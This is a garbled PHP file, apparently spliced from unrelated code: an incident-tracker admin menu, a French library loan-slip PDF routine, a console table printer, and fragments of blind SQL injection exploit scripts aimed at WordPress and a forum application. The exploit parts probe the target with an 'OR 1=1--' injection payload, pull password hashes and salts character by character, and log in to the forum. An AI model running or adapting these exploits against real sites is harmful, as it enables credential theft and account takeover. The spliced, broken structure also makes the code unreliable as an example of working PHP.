<div id="wrapper" style="width:95%;">
<div id="content">
<?php
if ($_SESSION['logged_in'] == 1) {
echo "<div id=\"inv_menu\">\n\t\t<div style=\"float:left\">Logged in as: " . $_SESSION['username'] . "</div>\n";
if ($allow_edit) {
echo "\n\t\t\t\t<a href=\"" . $php_self . "?function=get_incidents\" class=\"menulink\">Browse Incidents</a> |\n\t\t\t\t<a href=\"" . $php_self . "?function=add_line\" class=\"menulink\">Add New Incident</a> |";
}
//echo " <a href=\"" . $php_self . "\" class=\"menulink\" onClick=\"open_calendar()\">View Calendar</a> |";
echo "<a href=\"admin/index.php\" class=\"menulink\">Admin Home</a> |\n\t\t\t\t<a href=\"admin/index.php?logout=1\" class=\"menulink\">Logout</a>\n\t\t\t</div><br style=\"clear:left;\">\n";
switch ($function) {
case "add_line":
if ($_POST['status'] == "insert") {
add_line();
add_line_form($php_self);
} else {
add_line_form($php_self);
}
break;
case "rm_line":
if ($_POST['status'] == "remove") {
rm_line();
$get_incidents_result = get_incidents();
display_incidents($get_incidents_result, $php_self);
} else {
rm_line_form($_GET['idx'], $php_self);
}
break;
case "show_incident_details":
$prefix = 'wp_';
// WordPress table prefix, default is "wp_"
//======================================================================
echo "Target: {$url}\n";
echo "sql table prefix: {$prefix}\n";
if (empty($suffix)) {
$suffix = md5(substr($url, 0, strlen($url) - 24));
}
echo "cookie suffix: {$suffix}\n";
echo "testing probe delays \n";
$norm_delay = get_normdelay($testcnt);
echo "normal delay: {$norm_delay} deciseconds\n";
$hash = get_hash();
add_line("Target: {$url}");
add_line("User ID: {$id}");
add_line("Hash: {$hash}");
echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! :) \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_pass';
$out = '';
echo "finding hash now ...\n";
for ($i = 1; $i < $len + 1; $i++) {
$ch = get_hashchar($field, $i);
echo "got {$field} pos {$i} --> {$ch}\n";
$out .= "{$ch}";
}
$header_aut .= implode(", ", $aut1_libelle);
}
$header_aut ? $auteur = " / " . $header_aut : ($auteur = "");
// récupération du titre de série
if ($expl->tparent_id && $expl->m_id) {
$parent = new serie($expl->tparent_id);
$tit_serie = $parent->name;
if ($expl->tnvol) {
$tit_serie .= ', ' . $expl->tnvol;
}
}
if ($tit_serie) {
$expl->tit = $tit_serie . '. ' . $expl->tit;
}
// cote: soit param persio de notice, ou bien la vraie cote de l'exemplaire
$p_perso = new parametres_perso("notices");
$cote = $expl->expl_cote;
if (!$cote) {
$cote = $p_perso->read_base_fields_perso("ancienne_cote", $expl->s_id);
}
$ourPDF->SetY(50);
add_line("Titre", $expl->tit);
add_line("No. exemplaire", $cote);
if ($expl->bulletin_numero) {
add_line("Numéro", $numero);
}
add_line("Code", $cb_doc);
add_line("Date", $expl->aff_pret_date . ' ' . date("H:i"));
add_line("Emprunteur", $emprunteur);
$ourPDF->OutPut();
add_line("------------------------------------------");
if ($ch_option == 2) {
$hash = get_hash($i);
$salt = get_salt($i);
$line = "{$i}:{$hash}:{$salt}";
add_line($line);
xecho("\n------------------------------------------\n");
xecho("User ID: {$i}\n");
xecho("Hash: {$hash}\n");
xecho("Salt: {$salt}");
xecho("\n------------------------------------------\n");
} else {
if ($ch_option == 1) {
$uname = get_user($i);
$line = "The username for id {$i} is {$uname}";
add_line($line);
xecho("{$uname}");
}
}
xecho("\nQuestions and feedback - http://de.crypt.in/ \n");
die(" \n");
//////////////////////////////////////////////////////////////////////
function login_to_forum($user, $pass)
{
global $url;
$post = 'app=core&module=global§ion=login&do=process&username='******'&password='******'&rememberMe=1';
$buff = trim(make_post($url, $post, '', $url));
if (strpos($buff, 'The login was successful!') > 0) {
xecho("Logged in.\n");
} else {
xecho("Error: Unable to login.");
if (is_null($arg)) {
$arg_name = "NULL";
} else {
if (is_string($arg)) {
$arg_name = $arg;
} else {
$arg_name = strval($arg);
}
}
}
}
$arg_name = preg_replace("#\\s+#", " ", $arg_name);
$print_able_args[] = str::limit_chars($arg_name, 15, "");
}
}
$msg_line .= implode(", ", $print_able_args);
$msg_line .= ")";
add_line($msg_line);
$x++;
}
}
add_break();
echo "\n";
function add_line($str)
{
echo " | " . str_pad(str::limit_chars($str, $_ENV['box_width'] - 4, ""), $_ENV['box_width'] - 4, " ") . " |\n";
}
function add_break()
{
echo " +" . str_repeat('-', $_ENV['box_width'] - 2) . "+\n";
}
//=====================================================================
xecho("Target: {$url}\n");
xecho("Sql table prefix: {$prefix}\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
xecho("Testing target ID ... \n");
test_target_id();
xecho("Target ID seems to be valid\n");
$hash = get_hash();
$salt = get_salt();
add_line("Target: {$url}");
add_line("User ID: {$id}");
add_line("Hash: {$hash}");
add_line("Salt: {$salt}");
add_line("------------------------------------------");
xecho("\n------------------------------------------\n");
xecho("Hash: {$hash}\n");
xecho("Salt: {$salt}");
xecho("\n------------------------------------------\n");
xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
global $url;
$post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
$buff = trim(make_post($url, $post, '', $url));
if ($buff !== 'found') {
die('Invalid response, target URL not valid? Exiting ...');